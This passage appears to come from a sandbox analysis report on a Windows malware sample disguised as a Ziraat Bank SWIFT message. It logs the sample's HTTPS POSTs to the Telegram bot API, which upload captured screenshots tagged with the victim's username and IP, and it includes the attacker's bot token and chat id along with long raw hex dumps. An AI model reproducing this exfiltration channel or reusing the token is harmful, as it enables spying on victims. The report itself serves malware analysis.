                                                                        Data Ascii: #^0G!\-ZOH9s"""DRo"7,P"7D$J$H-%8{b.YpRotABQZvq[!~N$oyH9s+;s|ap8.(.Vs:oC|U,F@+#$%@PRpH<;_'zM^sIAC"
                                                                        2024-12-12 20:39:09 UTC16355OUTData Raw: 80 c4 26 bf f4 57 b5 65 bd f9 c8 40 05 a0 72 4d b9 87 58 03 c5 9d 22 0e e9 d6 8a 3e f3 cc 65 1f f3 21 0a 3b 63 ee a9 10 a4 65 6c 8e c2 71 94 7c 43 9b ad 57 e4 29 fb 90 78 de fa 0b c4 89 29 f7 cc 01 e6 c8 e1 36 61 41 08 ba 86 b1 c2 ec f0 49 9f 1a bf 05 48 cb 58 19 47 5f 01 07 8e 91 71 e6 44 01 27 e4 32 4f 4b 6e cc 37 ee 7e 10 c7 bc 83 cf a0 b5 1f f3 d9 c3 18 d8 27 ee dc 2c 89 47 1c 11 28 f1 66 5f 69 c7 11 f7 da 7b 01 b8 1d 8e 53 01 98 cd 67 52 6f 15 ea de 2b 54 ec a5 ef b0 02 d9 9e 3b 63 fb c7 87 61 55 e1 d7 a2 00 54 02 ca 58 0d f8 c1 07 bb 03 1f ea 46 18 af 5d 71 7f 59 db cb c0 2d df 0e 5c b1 12 50 e9 87 08 94 28 01 ab 84 2b ed 94 f4 3b ef f6 5d 15 80 51 f8 b5 44 41 b7 d7 64 82 6f 11 ad 00 6c c9 24 dd f1 c0 5e 09 c0 79 ec 54 00 2e 43 26 f9 e6 91 49 bf 88
                                                                        Data Ascii: &We@rMX">e!;celq|CW)x)6aAIHXG_qD'2OKn7~',G(f_i{SgRo+T;caUTXF]qY-\P(+;]QDAdol$^yT.C&I
                                                                        2024-12-12 20:39:09 UTC16355OUTData Raw: a2 85 12 70 ba ca 6e 76 ac 07 41 37 dd 66 3f 67 a4 cf dd 4d e2 f3 a7 e1 bd 23 1c fd b5 f5 e8 70 7b 64 f8 e0 07 ef ef 36 0a 07 ae 3c 5a fe ac ef 2d 7f a6 e5 67 47 80 22 1b eb f7 03 cb ff 56 40 f3 ed 40 51 04 b6 28 eb 66 71 e0 dc 9e 4c 9a c1 94 e4 2b 64 12 11 da 3c f0 fb 80 2d b5 a2 31 b4 c7 82 c9 d9 b7 cc 64 91 dc 5b 06 8f 08 6f 97 4c fa ad 42 26 05 57 21 93 7e 91 ad 42 af a5 bc c7 2e b1 dd 23 c2 73 79 d7 0f e6 b2 17 c2 70 f2 ce ad a2 6f b7 98 bc fd e6 29 32 e9 17 59 7f 7b 59 d7 c4 32 11 38 93 3f f8 5e b7 f6 fb b3 59 5f 91 b5 b7 7c 77 9a 37 4f 0b c1 55 d9 f8 bd ef cf 65 fd 4d e5 77 50 d8 58 82 f5 37 de b4 85 b5 df 2d ef 5d da 2c b7 9f eb 45 e0 76 51 00 2e 0b f2 cf b6 25 3b 3a 6c 05 e0 76 99 27 f1 76 2a 09 01 01 b8 88 f5 5f fb d6 16 d6 7e f5 ef 2a 99 14 8c
                                                                        Data Ascii: pnvA7f?gM#p{d6<Z-gG"V@@Q(fqL+d<-1d[oLB&W!~B.#sypo)2Y{Y28?^Y_|w7OUeMwPX7-],EvQ.%;:lv'v*_~*
                                                                        2024-12-12 20:39:09 UTC16355OUTData Raw: 19 08 e7 1c 3b 01 b8 17 12 30 93 7e 91 28 f0 22 13 05 5d 32 37 0b d7 8c 2c 21 00 b9 bd 77 1e 99 f4 8b 64 d2 2f 92 49 b9 63 49 2a ff 00 91 d7 88 bd 55 79 28 04 e0 56 09 98 0b bb dd c2 6f 01 66 32 0f 1e e9 02 10 32 f1 27 fb 02 70 9a 4c f6 65 1c 2b 01 98 a1 fc 5b 46 00 4a 2b fe a4 95 7b 2d 59 ce 6e 0b c0 58 f1 17 05 60 5c db ca 3f 51 ee cd 12 80 31 16 05 a0 22 af 15 80 ad 04 64 ac dc ab fd 61 9d 02 90 aa bf 65 05 20 2d 47 7f 0f 51 6d 18 8e 01 cf 43 d1 27 b1 62 10 94 7f 0a 40 51 00 72 fc 97 16 e9 47 3c 5e 00 52 fb 67 6d 1e fb 05 a5 9f 55 7e f4 39 f6 8b f0 33 c7 31 df 0b 6c e5 1f 97 82 c0 a1 b3 7a 14 7f 51 00 52 01 e8 37 01 91 78 10 bf 01 a8 c8 ab 15 7c cd 78 14 7b 83 1c 8c 95 81 51 00 9a ef 65 1f b3 04 20 15 80 0a 3d 05 60 15 7b c3 85 20 56 fe 21 ff 8c 79 1c
                                                                        Data Ascii: ;0~("]27,!wd/IcI*Uy(Vof22'pLe+[FJ+{-YnX`\?Q1"dae -GQmC'b@QrG<^RgmU~931lzQR7x|x{Qe =`{ V!y
                                                                        2024-12-12 20:39:09 UTC16355OUTData Raw: 0f 21 e8 91 04 54 a5 a0 aa 05 8b 00 9c da c2 4d c1 3d 90 7d 48 bf ba 2a 70 f6 72 e2 cd cd c2 d3 5b 6d 9d 17 82 1c 13 d6 11 e1 22 05 bb 17 ff 5d 9a be d8 e6 24 01 cf ef 49 bf ee f9 36 5f 08 a5 dd 24 09 a4 9f 27 94 7e 9e 40 ba f5 13 49 bd 71 88 f6 1c 9d 48 ea 8d 83 17 7d 83 58 15 80 f6 b9 cb 24 00 97 4a 24 ff 20 92 7d 11 cf 25 01 18 0a bc a5 12 c8 bc 71 88 44 9f a7 96 7e 35 12 80 a3 8a c0 71 05 20 b7 00 d7 37 01 7b 34 e7 65 9f f0 f1 50 fe 19 e3 be f7 6f 98 00 8c 24 a0 8e fb d2 f7 39 b5 00 54 25 60 2d 00 23 b1 17 c5 22 72 4e 91 7b 3a 02 ec 05 9f 17 81 0b 09 c0 41 82 4f 63 c5 16 42 e2 af a5 12 7f 42 95 80 aa 0c 44 06 d2 22 04 bb c7 dd 91 85 9d 97 7a 12 80 12 7a f4 41 37 06 4b f2 49 fc 51 e9 07 7e 4e 31 e6 b5 9f 62 48 3f aa 01 e7 55 04 16 91 27 e1 c7 7b 01 55
                                                                        Data Ascii: !TM=}H*pr[m"]$I6_$'~@IqH}X$J$ }%qD~5q 7{4ePo$9T%`-#"rN{:AOcBBD"zzA7KIQ~N1bH?U'{U
                                                                        2024-12-12 20:39:09 UTC16355OUTData Raw: be ba b8 b9 44 a4 5b 6e 0c 6e 2b 00 87 08 40 dd 16 bc 54 09 f8 7c 14 80 d3 67 d9 f7 53 a8 e7 56 05 60 3f d1 7b 05 47 45 02 70 e6 fd 0f f5 89 bc c5 52 0b c0 90 11 05 a0 f2 23 69 37 49 bc f8 8b 64 5f 14 f3 2c 55 00 6a 0d 92 af 3d ee 5b c6 b3 36 b7 ab 0b c0 d9 80 99 b7 df db 82 e4 1b 86 84 dd 62 90 f0 93 e0 ab e7 10 7c 9a d3 b8 06 c9 a7 5b 80 bd f8 13 4b 15 80 b5 f0 93 10 54 5f 52 6f 10 e3 08 c0 48 02 22 eb 24 00 55 f5 e7 ab 01 bd 00 f4 79 92 7e 82 18 48 fc b1 2e cb c5 2a af 16 80 d0 1e 23 96 dc ab 84 5f 2d ff f2 6d c0 45 fc 65 d9 47 c5 df 31 77 f4 e4 9f c1 b1 5e 04 1c ef ff cb e3 72 63 30 63 ad cb 6b 9c ec 93 b4 f3 30 af 63 c0 cc 33 96 f8 ab e3 9a 93 00 64 ac 8a 3e 5a 64 20 02 b0 ad ee b3 b8 8e ff 22 04 f5 8e 40 e6 c9 cf 14 f9 37 88 75 b6 27 ad 64 9e 97 7d
                                                                        Data Ascii: D[nn+@T|gSV`?{GEpR#i7Id_,Uj=[6b|[KT_RoH"$Uy~H.*#_-mEeG1w^rc0ck0c3d>Zd "@7u'd}
                                                                        2024-12-12 20:39:09 UTC16355OUTData Raw: d7 cb 3f e2 ad 10 ac 85 9f 13 82 99 22 00 6b 54 e5 87 d4 53 95 1f 78 01 48 d5 9f 8e 09 93 c3 3a bd 03 50 95 7f ad f8 33 74 1c 38 c7 8b dc 93 e8 93 f8 f3 68 ce 8b 3e f0 63 2f 02 25 00 95 d3 3d a6 79 f7 9f 2a ff 74 fc d7 e3 8f fb 4a 04 22 fa 5a c1 57 84 1f 31 e5 fa f9 d9 63 ee 68 2e 12 39 fa f6 34 7d 54 53 11 28 01 48 1f f9 87 18 94 24 d4 25 21 12 82 92 7f 12 72 b5 04 64 4e 02 4f 71 a4 9f 04 20 d0 47 ec 91 43 3e d5 80 ac 25 c6 bb 02 99 f7 7b d2 4a 08 4a d8 09 c6 c8 3b 09 41 2f 00 89 49 fe e9 1d 80 f4 6b 01 48 9e e2 08 3c 09 3b 89 3f 5a f0 97 86 30 4f ae cf a9 e5 a0 df 4b 73 54 f9 a9 d2 4f 52 cf 0b 41 5f ed 57 4b 40 40 e0 49 da 49 e0 21 ec 10 78 92 7f 12 7a b9 92 0f 79 67 71 bf 8e 7c aa fe 34 cf 9c 68 df 21 68 eb a1 96 79 12 80 c4 18 23 07 6b 01 a8 b1 d6 28
                                                                        Data Ascii: ?"kTSxH:P3t8h>c/%=y*tJ"ZW1ch.94}TS(H$%!rdNOq GC>%{JJ;A/IkH<;?Z0OKsTORA_WK@@II!xzygq|4h!hy#k(
                                                                        2024-12-12 20:39:10 UTC389INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:39:10 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 1814
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.549779149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:39:13 UTC2114OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0 [TRUNCATED]
                                                                        Content-Type: multipart/form-data; boundary================8dd1c056c2add6f
                                                                        Host: api.telegram.org
                                                                        Content-Length: 675718
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:39:13 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 63 30 35 36 63 32 61 64 64 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70
                                                                        Data Ascii: --===============8dd1c056c2add6fContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAap
                                                                        2024-12-12 20:39:13 UTC16355OUTData Raw: 9c d9 8b 21 21 41 71 3a fe 94 a7 3b b1 d4 35 c2 4f d7 7a d5 e1 07 08 3e 7f ee 9f 4b 40 c1 0b 3f 10 7d e5 ba ef 4e 74 0e 12 a7 b6 17 43 f4 f1 22 10 ef fa 63 04 3d 1b 50 71 ea 18 79 56 a0 64 a1 3a 06 81 bc 60 4d 5e cf ff 53 07 e0 b2 1d 63 5a 21 d8 08 3a 24 5b 91 71 39 ae 2b bf 08 3e 49 3e c5 18 89 21 08 d9 2f 01 a8 73 bd 8b 8f b9 3a f4 80 f9 9a 5d 79 e1 48 3e ab 91 80 ca a9 de f7 03 75 aa 57 8e 51 2f 11 e1 0c 3f 8b 6b bd 83 84 9d 04 1d b2 0f e9 86 8c 23 c6 1e 62 ec 93 c0 23 2e 49 a7 7d aa 57 4e 73 c7 f7 e8 b3 15 63 ce 19 7c 8e be 27 71 7d 7e f9 ec 06 09 3b 46 c5 56 72 4e 8e 69 94 d0 63 ad 7a d5 0a e2 7e 06 73 5d f7 55 4c 73 ce 42 d0 81 e4 9b 84 1e 6b c4 9c 62 92 74 cc 55 2b 01 c8 ba 3e 87 7a 40 dc b1 f6 bd a2 fe 5c c5 b5 97 3c fb f9 1c d5 11 67 4e ac bc 2d
                                                                        Data Ascii: !!Aq:;5Oz>K@?}NtC"c=PqyVd:`M^ScZ!:$[q9+>I>!/s:]yH>uWQ/?k#b#.I}WNsc|'q}~;FVrNicz~s]ULsBkbtU+>z@\<gN-
                                                                        2024-12-12 20:39:13 UTC16355OUTData Raw: fd 7e 6d 98 d1 eb 25 ff b4 97 39 f2 4f 02 50 fb da bd 88 b3 06 49 3b 40 d0 01 71 09 40 e2 12 80 d4 4a e2 a9 5e 7b 85 62 d4 a8 2e 12 7e aa f7 3a e5 10 7f c0 b5 df ee 4b ce 2c 73 75 04 32 47 ee 21 00 19 79 23 b0 9e f1 a7 0e 40 c9 c0 22 fb 38 93 cf e1 7b 37 39 84 9f 40 e8 21 f6 04 b2 4f 90 a3 86 b9 72 ac 17 2c 00 bd f3 cf e3 9f fc e1 ba 74 fe 05 17 a6 cb ae b8 2a 14 7c a3 18 26 00 1d 97 81 ff c7 37 f2 7f 60 1d 3f f3 d6 df 41 6f fe 75 5c e8 0d 43 42 2c 8a 0d c3 eb 23 8e 58 7b 5e 23 00 eb ee bf c3 33 9f 4a bf bf ef ab a1 8c aa a9 05 e0 0d 37 dc b0 5e 04 60 74 ed d7 89 64 de 7c 58 12 80 fd 82 8e f9 d2 15 e0 f1 78 be 09 c0 0e 02 ae 8a 8d 4b 24 ff 9c 50 fa 39 81 f4 73 5c f2 0d 63 96 98 1b 10 9f 34 eb 5b 00 ae 6f 09 18 c9 3f d8 18 05 20 44 92 6f 18 91 f4 73 6a a1
                                                                        Data Ascii: ~m%9OPI;@q@J^{b.~:K,su2G!y#@"8{79@!Or,t*|&7`?Aou\CB,#X{^#3J7^`td|XxK$P9s\c4[o? Dosj
                                                                        2024-12-12 20:39:13 UTC16355OUTData Raw: bf 9f 23 fc ae 5e 30 f3 bb 1a d5 01 c8 fe 9c e3 f3 ba 47 e7 df 8f 11 89 bd 96 21 f2 0f 5c e2 2d 84 5a cc 0d 8a 4f 9a 48 fa 39 91 f4 73 22 89 b7 10 22 89 b7 10 22 e9 e7 44 52 6f 1c 22 a9 37 0e 91 e4 1b c6 2c 81 b7 50 22 a9 37 0e 81 f0 1b 44 24 f0 16 4a 24 fd 9c 48 e4 2d 84 25 01 38 9c e7 9e 00 ec a7 fb e1 7b c6 62 2e d2 cf 59 88 00 84 d9 02 70 81 04 52 6f 1c 10 80 a2 74 e2 8d 8b c9 bc 88 41 42 51 f9 5a 00 76 de 71 5b 21 92 7e 4e 24 00 bb 6f bb 79 16 91 d4 1b 87 48 fa 39 91 e4 73 ea 2b c4 93 10 80 11 91 dc ab 3b ff 14 73 90 7c f5 15 61 70 01 38 97 2e c0 28 0f 2e fc bc 56 73 ae fc 8a f6 3a 6f 43 11 7c 55 cd 2c 46 08 40 c9 bf ce 2b af ee 93 80 9a 23 f9 24 01 25 ff 40 02 50 52 70 10 48 3c c9 3b e4 9f 5f 27 ee 13 7a 4d 5e 73 49 c0 41 c2 10 c1 87 f4 43 00 22 fa
                                                                        Data Ascii: #^0G!\-ZOH9s"""DRo"7,P"7D$J$H-%8{b.YpRotABQZvq[!~N$oyH9s+;s|ap8.(.Vs:oC|U,F@+#$%@PRpH<;_'zM^sIAC"
                                                                        2024-12-12 20:39:13 UTC16355OUTData Raw: 80 c4 26 bf f4 57 b5 65 bd f9 c8 40 05 a0 72 4d b9 87 58 03 c5 9d 22 0e e9 d6 8a 3e f3 cc 65 1f f3 21 0a 3b 63 ee a9 10 a4 65 6c 8e c2 71 94 7c 43 9b ad 57 e4 29 fb 90 78 de fa 0b c4 89 29 f7 cc 01 e6 c8 e1 36 61 41 08 ba 86 b1 c2 ec f0 49 9f 1a bf 05 48 cb 58 19 47 5f 01 07 8e 91 71 e6 44 01 27 e4 32 4f 4b 6e cc 37 ee 7e 10 c7 bc 83 cf a0 b5 1f f3 d9 c3 18 d8 27 ee dc 2c 89 47 1c 11 28 f1 66 5f 69 c7 11 f7 da 7b 01 b8 1d 8e 53 01 98 cd 67 52 6f 15 ea de 2b 54 ec a5 ef b0 02 d9 9e 3b 63 fb c7 87 61 55 e1 d7 a2 00 54 02 ca 58 0d f8 c1 07 bb 03 1f ea 46 18 af 5d 71 7f 59 db cb c0 2d df 0e 5c b1 12 50 e9 87 08 94 28 01 ab 84 2b ed 94 f4 3b ef f6 5d 15 80 51 f8 b5 44 41 b7 d7 64 82 6f 11 ad 00 6c c9 24 dd f1 c0 5e 09 c0 79 ec 54 00 2e 43 26 f9 e6 91 49 bf 88
                                                                        Data Ascii: &We@rMX">e!;celq|CW)x)6aAIHXG_qD'2OKn7~',G(f_i{SgRo+T;caUTXF]qY-\P(+;]QDAdol$^yT.C&I
                                                                        2024-12-12 20:39:13 UTC16355OUTData Raw: a2 85 12 70 ba ca 6e 76 ac 07 41 37 dd 66 3f 67 a4 cf dd 4d e2 f3 a7 e1 bd 23 1c fd b5 f5 e8 70 7b 64 f8 e0 07 ef ef 36 0a 07 ae 3c 5a fe ac ef 2d 7f a6 e5 67 47 80 22 1b eb f7 03 cb ff 56 40 f3 ed 40 51 04 b6 28 eb 66 71 e0 dc 9e 4c 9a c1 94 e4 2b 64 12 11 da 3c f0 fb 80 2d b5 a2 31 b4 c7 82 c9 d9 b7 cc 64 91 dc 5b 06 8f 08 6f 97 4c fa ad 42 26 05 57 21 93 7e 91 ad 42 af a5 bc c7 2e b1 dd 23 c2 73 79 d7 0f e6 b2 17 c2 70 f2 ce ad a2 6f b7 98 bc fd e6 29 32 e9 17 59 7f 7b 59 d7 c4 32 11 38 93 3f f8 5e b7 f6 fb b3 59 5f 91 b5 b7 7c 77 9a 37 4f 0b c1 55 d9 f8 bd ef cf 65 fd 4d e5 77 50 d8 58 82 f5 37 de b4 85 b5 df 2d ef 5d da 2c b7 9f eb 45 e0 76 51 00 2e 0b f2 cf b6 25 3b 3a 6c 05 e0 76 99 27 f1 76 2a 09 01 01 b8 88 f5 5f fb d6 16 d6 7e f5 ef 2a 99 14 8c
                                                                        Data Ascii: pnvA7f?gM#p{d6<Z-gG"V@@Q(fqL+d<-1d[oLB&W!~B.#sypo)2Y{Y28?^Y_|w7OUeMwPX7-],EvQ.%;:lv'v*_~*
                                                                        2024-12-12 20:39:13 UTC16355OUTData Raw: 19 08 e7 1c 3b 01 b8 17 12 30 93 7e 91 28 f0 22 13 05 5d 32 37 0b d7 8c 2c 21 00 b9 bd 77 1e 99 f4 8b 64 d2 2f 92 49 b9 63 49 2a ff 00 91 d7 88 bd 55 79 28 04 e0 56 09 98 0b bb dd c2 6f 01 66 32 0f 1e e9 02 10 32 f1 27 fb 02 70 9a 4c f6 65 1c 2b 01 98 a1 fc 5b 46 00 4a 2b fe a4 95 7b 2d 59 ce 6e 0b c0 58 f1 17 05 60 5c db ca 3f 51 ee cd 12 80 31 16 05 a0 22 af 15 80 ad 04 64 ac dc ab fd 61 9d 02 90 aa bf 65 05 20 2d 47 7f 0f 51 6d 18 8e 01 cf 43 d1 27 b1 62 10 94 7f 0a 40 51 00 72 fc 97 16 e9 47 3c 5e 00 52 fb 67 6d 1e fb 05 a5 9f 55 7e f4 39 f6 8b f0 33 c7 31 df 0b 6c e5 1f 97 82 c0 a1 b3 7a 14 7f 51 00 52 01 e8 37 01 91 78 10 bf 01 a8 c8 ab 15 7c cd 78 14 7b 83 1c 8c 95 81 51 00 9a ef 65 1f b3 04 20 15 80 0a 3d 05 60 15 7b c3 85 20 56 fe 21 ff 8c 79 1c
                                                                        Data Ascii: ;0~("]27,!wd/IcI*Uy(Vof22'pLe+[FJ+{-YnX`\?Q1"dae -GQmC'b@QrG<^RgmU~931lzQR7x|x{Qe =`{ V!y
                                                                        2024-12-12 20:39:13 UTC16355OUTData Raw: 0f 21 e8 91 04 54 a5 a0 aa 05 8b 00 9c da c2 4d c1 3d 90 7d 48 bf ba 2a 70 f6 72 e2 cd cd c2 d3 5b 6d 9d 17 82 1c 13 d6 11 e1 22 05 bb 17 ff 5d 9a be d8 e6 24 01 cf ef 49 bf ee f9 36 5f 08 a5 dd 24 09 a4 9f 27 94 7e 9e 40 ba f5 13 49 bd 71 88 f6 1c 9d 48 ea 8d 83 17 7d 83 58 15 80 f6 b9 cb 24 00 97 4a 24 ff 20 92 7d 11 cf 25 01 18 0a bc a5 12 c8 bc 71 88 44 9f a7 96 7e 35 12 80 a3 8a c0 71 05 20 b7 00 d7 37 01 7b 34 e7 65 9f f0 f1 50 fe 19 e3 be f7 6f 98 00 8c 24 a0 8e fb d2 f7 39 b5 00 54 25 60 2d 00 23 b1 17 c5 22 72 4e 91 7b 3a 02 ec 05 9f 17 81 0b 09 c0 41 82 4f 63 c5 16 42 e2 af a5 12 7f 42 95 80 aa 0c 44 06 d2 22 04 bb c7 dd 91 85 9d 97 7a 12 80 12 7a f4 41 37 06 4b f2 49 fc 51 e9 07 7e 4e 31 e6 b5 9f 62 48 3f aa 01 e7 55 04 16 91 27 e1 c7 7b 01 55
                                                                        Data Ascii: !TM=}H*pr[m"]$I6_$'~@IqH}X$J$ }%qD~5q 7{4ePo$9T%`-#"rN{:AOcBBD"zzA7KIQ~N1bH?U'{U
                                                                        2024-12-12 20:39:13 UTC16355OUTData Raw: be ba b8 b9 44 a4 5b 6e 0c 6e 2b 00 87 08 40 dd 16 bc 54 09 f8 7c 14 80 d3 67 d9 f7 53 a8 e7 56 05 60 3f d1 7b 05 47 45 02 70 e6 fd 0f f5 89 bc c5 52 0b c0 90 11 05 a0 f2 23 69 37 49 bc f8 8b 64 5f 14 f3 2c 55 00 6a 0d 92 af 3d ee 5b c6 b3 36 b7 ab 0b c0 d9 80 99 b7 df db 82 e4 1b 86 84 dd 62 90 f0 93 e0 ab e7 10 7c 9a d3 b8 06 c9 a7 5b 80 bd f8 13 4b 15 80 b5 f0 93 10 54 5f 52 6f 10 e3 08 c0 48 02 22 eb 24 00 55 f5 e7 ab 01 bd 00 f4 79 92 7e 82 18 48 fc b1 2e cb c5 2a af 16 80 d0 1e 23 96 dc ab 84 5f 2d ff f2 6d c0 45 fc 65 d9 47 c5 df 31 77 f4 e4 9f c1 b1 5e 04 1c ef ff cb e3 72 63 30 63 ad cb 6b 9c ec 93 b4 f3 30 af 63 c0 cc 33 96 f8 ab e3 9a 93 00 64 ac 8a 3e 5a 64 20 02 b0 ad ee b3 b8 8e ff 22 04 f5 8e 40 e6 c9 cf 14 f9 37 88 75 b6 27 ad 64 9e 97 7d
                                                                        Data Ascii: D[nn+@T|gSV`?{GEpR#i7Id_,Uj=[6b|[KT_RoH"$Uy~H.*#_-mEeG1w^rc0ck0c3d>Zd "@7u'd}
                                                                        2024-12-12 20:39:13 UTC16355OUTData Raw: d7 cb 3f e2 ad 10 ac 85 9f 13 82 99 22 00 6b 54 e5 87 d4 53 95 1f 78 01 48 d5 9f 8e 09 93 c3 3a bd 03 50 95 7f ad f8 33 74 1c 38 c7 8b dc 93 e8 93 f8 f3 68 ce 8b 3e f0 63 2f 02 25 00 95 d3 3d a6 79 f7 9f 2a ff 74 fc d7 e3 8f fb 4a 04 22 fa 5a c1 57 84 1f 31 e5 fa f9 d9 63 ee 68 2e 12 39 fa f6 34 7d 54 53 11 28 01 48 1f f9 87 18 94 24 d4 25 21 12 82 92 7f 12 72 b5 04 64 4e 02 4f 71 a4 9f 04 20 d0 47 ec 91 43 3e d5 80 ac 25 c6 bb 02 99 f7 7b d2 4a 08 4a d8 09 c6 c8 3b 09 41 2f 00 89 49 fe e9 1d 80 f4 6b 01 48 9e e2 08 3c 09 3b 89 3f 5a f0 97 86 30 4f ae cf a9 e5 a0 df 4b 73 54 f9 a9 d2 4f 52 cf 0b 41 5f ed 57 4b 40 40 e0 49 da 49 e0 21 ec 10 78 92 7f 12 7a b9 92 0f 79 67 71 bf 8e 7c aa fe 34 cf 9c 68 df 21 68 eb a1 96 79 12 80 c4 18 23 07 6b 01 a8 b1 d6 28
                                                                        Data Ascii: ?"kTSxH:P3t8h>c/%=y*tJ"ZW1ch.94}TS(H$%!rdNOq GC>%{JJ;A/IkH<;?Z0OKsTORA_WK@@II!xzygq|4h!hy#k(
                                                                        2024-12-12 20:39:15 UTC389INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:39:15 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 1821
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.549790149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:39:18 UTC2114OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0 [TRUNCATED]
                                                                        Content-Type: multipart/form-data; boundary================8dd1c3bef997f68
                                                                        Host: api.telegram.org
                                                                        Content-Length: 675718
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:39:18 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 63 33 62 65 66 39 39 37 66 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae 